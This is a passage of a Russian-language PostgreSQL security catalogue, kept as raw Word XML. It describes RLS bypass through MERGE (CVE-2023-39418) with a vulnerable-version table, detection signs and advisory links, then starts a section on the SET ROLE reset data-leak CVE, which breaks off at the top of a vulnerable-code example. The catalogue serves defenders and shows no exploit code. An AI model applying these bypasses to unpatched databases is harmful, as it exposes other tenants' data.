              </w:rPr>
              <w:t>10 августа 2023</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0019479F" w14:paraId="5F99C70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2CD651"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26D3D8" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>только PG 15.0, 15.1, 15.2, 15.3</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0019479F" w14:paraId="002BCE73"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755546"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553054" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>PG 15.4</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0019479F" w14:paraId="3911E34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9BD3A4"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130776" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>MERGE statement не enforce UPDATE/SELECT RLS policies</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0019479F" w14:paraId="7A89A33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49EBF7"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EE719E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>RLS bypass через MERGE-specific paths</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0D47A00C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Как выглядит легитимное использование.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> MERGE — стандартный SQL standard statement для </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>idempotent upsert</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FD393DA" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-- Legitimate: upsert через MERGE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42DBBB1B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>MERGE INTO products AS t</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02A5DB65" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>USING (VALUES (101, 'New Widget', 19.99))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FDE6A57" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">      AS s(id, name, price)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02A24B60" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    ON t.id = s.id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27325C19" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>WHEN MATCHED AND t.price &lt;&gt; s.price THEN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5203E3BB" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    UPDATE SET price = s.price, updated_at = now()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A4453B3" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>WHEN NOT MATCHED THEN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A4BE0E8" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    INSERT (id, name, price) VALUES (s.id, s.name, s.price);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BFFE6E5" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Pre-MERGE альтернативы (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>INSERT ... ON CONFLICT DO UPDATE</w:t>
      </w:r>
      <w:r>
        <w:t>) часто использовались для upsert, но MERGE более выразителен для complex matching logic.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6349A506" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">На patched PG версиях (15.4+, 16.x+) MERGE с RLS работает корректно: SELECT/UPDATE policies применяются на всех internal paths, INSERT WITH CHECK — как обычно. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Не нужно избегать MERGE на patched PG</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B4CBC1C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Признаки атаки:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69D94B59" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>`pg_stat_statements`</w:t>
      </w:r>
      <w:r>
        <w:t>: MERGE statements на RLS-protected tables от user-роли (не admin).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="502C729E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Application audit</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: rows с </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>tenant_id</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ≠ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>creator_tenant_id</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (если приложение логирует creator).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5435F6B5" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>PG version</w:t>
      </w:r>
      <w:r>
        <w:t>: critical check для 15.0–15.3.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35465964" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Версии.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Уязвимы только:</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0A142AA7"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6E030C9" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Версия</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1BC7898" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Уязвима</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766B366F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Фикс</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0019479F" w14:paraId="7109F65E"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B4F28E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>15.0</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C9F9AB" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>да</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7BE4EC" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>15.4 (10.08.2023)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0019479F" w14:paraId="12883B2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3D5CAD" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>15.1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191B50" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>да</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3983F6" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>15.4</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0019479F" w14:paraId="5E9DCB64"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52F9C7" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>15.2</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450541" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>да</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E79722" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>15.4</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0019479F" w14:paraId="144359D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90A593" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>15.3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2CE7F8" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>да</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CC00B2" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>15.4</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0019479F" w14:paraId="10C07CF7"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DAA19C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>15.4+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76DE53" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>нет</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3BEB59" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>—</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0019479F" w14:paraId="17F776F5"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86DC15"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5EEFE" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>нет MERGE</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9E4631" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>—</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0019479F" w14:paraId="6A0FCE3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9B4E7A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>16.x+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1E5E02" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>сразу с фиксом</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095BB4" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>—</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7B6745A2" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Это </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>самое узкое version-window</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> среди CVE-anchored категорий 3.17 — buggy окно строго 10 месяцев. Production кластеры, обновлявшиеся timely, не были подвержены этой CVE даже теоретически.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43E74B64" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Связанные паттерны.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B4418C4" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.17.1 / 3.17.3 / 3.17.5</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — другие RLS-bypass vectors.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E76DE16" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.13 Privilege escalation</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — общая категория. CVE-2023-39418 — primarily data-access vector, но advisory отмечает potential для arbitrary code execution as bootstrap superuser в complex setup-ах (через side-effect attacks).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5132C563" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4.3 Хронология 2023</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — общий контекст 2023 CVE fix (одна из 2023 batch вместе с R12 CVE-2023-2454).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23CB472D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>5.3 Принцип наименьших привилегий</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>FORCE ROW LEVEL SECURITY</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> на critical tables как defence-in-depth.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48764584" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Источники.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C55AD52" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t>•   PostgreSQL Project Security Advisory: CVE-2023-39418 — https://www.postgresql.org/support/security/CVE-2023-39418/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DE710DB" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t>•   PostgreSQL 15.4 Release Notes — https://www.postgresql.org/docs/release/15.4/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="247E9B52" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t>•   NIST NVD: CVE-2023-39418 — https://nvd.nist.gov/vuln/detail/CVE-2023-39418</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="281952B6" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t>•   PostgreSQL Docs: «MERGE» — https://www.postgresql.org/docs/current/sql-merge.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E86D340" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>•   PostgreSQL Docs: «Row Security Policies» — https://www.postgresql.org/docs/current/ddl-rowsecurity.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="456334DD" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t>•   pganalyze blog: «PostgreSQL 15.4 security fixes» — https://pganalyze.com/blog/5mins-postgres-15-4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09EFCA72" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t>•   R11 (sources/research.md, строки 194–207)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F3627D1" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:t>3.17.3 SET ROLE reset (R8, CVE-2024-10978)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BA263CD" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Суть.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Тот же CVE-2024-10978, что описан в 3.13.1, но рассматривается под другим углом — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>как vector data exfiltration</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, а не privilege escalation. В 3.13.1 фокус: атакующий «попадает в чужую роль» и получает её привилегии. В 3.17.3 фокус: атакующий </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>читает чужие RLS-protected rows</w:t>
      </w:r>
      <w:r>
        <w:t>, потому что plan-cached query применяет RLS policy неверной роли.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FDB985F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Граница между 3.13.1 и 3.17.3 — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>семантическая, не техническая</w:t>
      </w:r>
      <w:r>
        <w:t>: один и тот же баг, два разных attack-outcome:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="367159BE" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.13.1</w:t>
      </w:r>
      <w:r>
        <w:t>: «execute как чужая роль» → privilege escalation (можно создать superuser, выдать гранты и т. д.).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="358C90B6" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.17.3</w:t>
      </w:r>
      <w:r>
        <w:t>: «прочитать как чужая роль» → data leak (видны строки RLS-protected таблиц других tenant).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C9862EB" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">В этом подразделе акцент на </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>второй паттерн</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> + cross-ref на 3.13.1 за detailed CVE-блок и общий механизм.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D17B22E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Уязвимый код.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="011B5C44" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t># app/db/session.py — multi-tenant connection-pool с SET ROLE per-request</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11AF501B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>from contextlib import asynccontextmanager</w:t>
      </w:r>
    </w:p>
